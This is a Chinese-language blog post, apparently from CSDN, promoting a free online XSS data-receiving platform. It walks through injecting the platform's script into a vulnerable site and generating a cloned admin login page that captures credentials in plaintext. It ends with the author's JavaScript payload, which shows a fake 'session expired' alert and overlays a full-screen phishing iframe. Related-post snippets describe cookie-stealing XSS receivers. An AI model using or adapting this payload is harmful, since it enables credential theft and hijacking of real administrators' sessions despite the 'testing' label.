XSS免费接收平台以及模拟钓鱼一键生成测试

最新推荐文章于 2024-09-10 15:48:00 发布
最新推荐文章于 2024-09-10 15:48:00 发布
阅读量1.8k 收藏 16
点赞数 9
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vetus1/article/details/140195178
版权

XSS(Cross-Site Scripting)漏洞,也称为跨站脚本攻击,是一种常见的web安全威胁。它通常发生在网站允许用户输入内容,并直接显示在网页上时,恶意攻击者会利用这种机制注入恶意脚本到用户的浏览器中。当其

他用户访问包含这些脚本的页面时,这些脚本会被执行,可以窃取用户的敏感信息(如cookies、登录凭证),修改页面内容,甚至控制用户的浏览器。

XSS的应用主要包括以下几个方面:

  1. 数据盗窃:通过获取受害者的cookie,攻击者可以长期追踪并操纵用户的账户。
  2. 界面劫持:将恶意代码嵌入页面布局,改变用户看到的内容,比如弹出广告或误导页面操作。
  3. 网站控制:在受害者不知情的情况下,对网站执行恶意操作,如删除或修改数据库内容。
  4. 钓鱼攻击:通过伪装成可信来源的网站,诱导用户点击,进而窃取信息或引导至欺诈页面。

防止XSS的关键在于对用户输入的数据进行适当的过滤和转义,以及使用HTTP-only和其他安全措施来保护敏感信息。

在线平台的运用
 

平台的网址是:

链接:XSS平台


这个是我在网上看到比较全功能的XSS免费测试平台 可以利用起来 好知道学习的方向 首先我们注册账号!
然后我们创建个项目



然后查看我们的测试代码

插入我们的测试代码 形成XSS返回上线状态


查看上线信息



即可获取可利用的点来进行xss测试 

这是生成测试钓鱼测试 后台网址url丢入即可生成测试页面 用来获取管理员账密
触发xss之后可以危害到管理员的页面劫持来形成钓鱼测试

钓鱼页面与登录页面一模一样 输入账号密码点击登录之后
xss平台接收到数据显示明文


附上自用的测试代码
 

function go(iframeSrc) {
  // 弹窗提醒用户需要重新登录
  alert("此会话已过期,您需要重新登录。");

  // 获取当前时间的时间戳
  var now = Date.now();

  // 获取上次加载 iframe 的时间戳
  var iframeLastLoaded = localStorage.getItem('iframeLastLoaded');

  // 如果没有记录或者超过了2小时(7200000 毫秒)
  if (!iframeLastLoaded || (now - parseInt(iframeLastLoaded, 10)) > 7200000) {
    // 创建一个 iframe 元素
    var iframe = document.createElement('iframe');
    iframe.src = iframeSrc;
    iframe.style.position = 'fixed';
    iframe.style.top = 0;
    iframe.style.left = 0;
    iframe.style.width = '100%';
    iframe.style.height = '100%';
    iframe.style.border = 'none';
    iframe.style.zIndex = 99999;
    document.body.appendChild(iframe);

    // 记录当前时间戳到 localStorage
    localStorage.setItem('iframeLastLoaded', now.toString());
  }
}

go('输入平台生成的钓鱼测试后台网址');

目录

\xss钓鱼测试触发途径有两个

TLXSS-
关注
轻量级个人XSS平台(BlueLotus_XSSReceiver-master蓝莲花)
DMXA的博客
11-01 937
该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大
软件测试知识体系图谱
weixin_50552058的博客
07-07 5036
软件测试基础图谱
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 6891
平台的网址是:链接:XSS在线平台
web基础之XSS
最新发布
m0_74080781的博客
09-10 1439
突然想到一个问题,我刚才制作的攻击语句中的IP是本地的回环地址,所以如果我在虚拟机的靶场中测试攻击,那么我的蓝莲花平台接收不到的,所以这里先在本地的靶场测试,等下在演示在虚拟机中的(如果蓝莲花平台部署在云服务器,就能攻击其他互联网用户)(2)尝试了大佬的在线xss平台;(该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好,所以就借助大佬搭建的xss平台作为本期演示平台)填写接收数据的url ,格式:当前蓝莲花平台的url + 文件名(文件名自己取)(1)首先尝试,不成功;
Xss测试平台.zip
03-06
XSSer——用于检测和利用XSS漏洞的自动Web测试框架工具 XSS是一种非常常见的漏洞类型,它分布非常广泛,且比较容易被检测到。 攻击者可以在无需验证的情况下将不受信任的JavaScript片段插入到应用程序中。然后,该JavaScript片段将会被访问目标站点的受害者执行。https://gbhackers.com/a3-cross-site-scripting-xss/ 跨站点“Scripter”(又名Xsser)是一个自动框架,用于检测、利用和报告基于Web的应用程序中的XSS漏洞。 它包含几个可以绕过某些过滤器的选项,以及各种特殊的代码注入技术。
XSS测试平台.zip
08-06
XSS测试平台测试XSS漏洞获取cookie并接收Web页面的平台
XSS数据接收平台
2301_81475812的博客
02-16 1642
存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;3.我的项目,点击创建,项目名称和描述随便填,之后点击下一步,选择需要的模板,这里选择“基础默认模块”就好,之后点击下一步,项目就创建成功了。4.提交后,显示安装成功,直接点击登录就跳转到,登录控制面板,输入前面的密码,即可登录到XSS接受面板。进入“我的JS”模块输入要创建的模板名,选择要用的模块,点击插入模块,之后点击新增按钮。4.将复制的payload,放到dvwa的xss模块执。
xss接收平台推荐-xss平台-xss在线平台
vetus1的博客
08-12 1412
目录二.XSS在线平台1.访问xss在线数据接收平台:2.创建xss测试项目​编辑3.查看项目对应xss测试代码4.在线功能发送即时代码5.自定义代码的利用6.伪造后台页面测试返回发送明文数据​ 7.延伸搭配自定义代码和发送js搭配模块 自动化钓鱼测试XSS平台-仅用于xss安全测试专用https://d00.cc我们可以看到 有很多返回的信息 包括页面截图 接下来我们测试一下触发效果
XSS测试平台源码——免费分享
sGanYu
08-09 2726
链接:https://pan.baidu.com/s/1Zfle6JsQUpukjiJFK7VoFg 提取码:ggyy
【愚公系列】《AIGC辅助软件开发》011-AI辅助编写技术文档:技术文档
热门推荐
时光隧道
07-24 1万+
在当今快速发展的技术环境中,技术文档的编写变得愈加重要。无论是软件开发、产品设计,还是系统架构,清晰、准确的技术文档不仅能帮助团队成员快速理解项目,还能为用户提供必要的使用指导。然而,编写高质量的技术文档常常是一项繁琐且耗时的任务。随着人工智能技术的不断进步,AI工具的辅助作用逐渐显现,特别是在技术文档的编写过程中。借助AI,开发者和技术作家可以更高效地生成、编辑和维护文档,从而专注于更高层次的创作和思考。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8127
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Web安全攻防 渗透测试实战指南3
jxy191021的博客
04-05 6335
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
Web安全防攻(渗透测试
m0_62959521的博客
04-07 3273
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5...
xss测试平台搭建
xdjxi的博客
03-16 5285
1.拉取镜像 docker pull daocloud.io/library/mysql:5.6 2.运行mysql服务,密码为root,端口号为3306 docker run --name mysqlserver -e MYSQL_ROOT_PASSWORD=root -d -i -p 3306:3306 daocloud.io/library/mysql:5.6 3. 搭建xss测试平台,拉取镜像 docker pull daxia/websafe 4. 运行容器 docker run --n..
XSS数据接收平台——蓝莲花(BlueLotus)
p36273的博客
06-17 6551
蓝莲花平台是清华大学曾经的蓝莲花战队搭建的平台,该平台用于接收xss返回数据。用xss数据接收平台的好处:正常执行反射型xss和存储型xss,反射型xss在执行poc时,会直接在页面弹出执行注入的poc代码;存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;而使用这种数据接收平台,在用户页面就不会再弹出这个窗口,但在数据接收平台还是可以获取到用户的cookie,以免被用户发觉。
XSS平台搭建及后台使用(cookie获取)
2302_79885863的博客
04-12 1708
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
xss平台测试
weixin_33716557的博客
03-26 344
2019独角兽企业重金招聘Python工程师标准>>> ...
XSS测试平台
weixin_33739646的博客
02-26 244
http://x.0x9.cc/index.php?do=register http://www.webxss.cn/index.php?do=register 转载于:https://blog.51cto.com/quiterr/1745248
生成安全测试xss注入代码测试vue页面
06-07
您可以使用一些自动化测试工具来生成安全测试XSS注入代码测试Vue页面。其中一个常用的工具是OWASP ZAP,它可以自动生成XSS注入代码并测试Vue页面的安全性。另外,您也可以手动编写XSS注入代码并在Vue页面中进行测试。这需要您有一定的安全测试经验和编程知识。无论使用哪种方法,都应该在开发和发布前进行安全测试以确保您的Vue应用程序的安全性。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值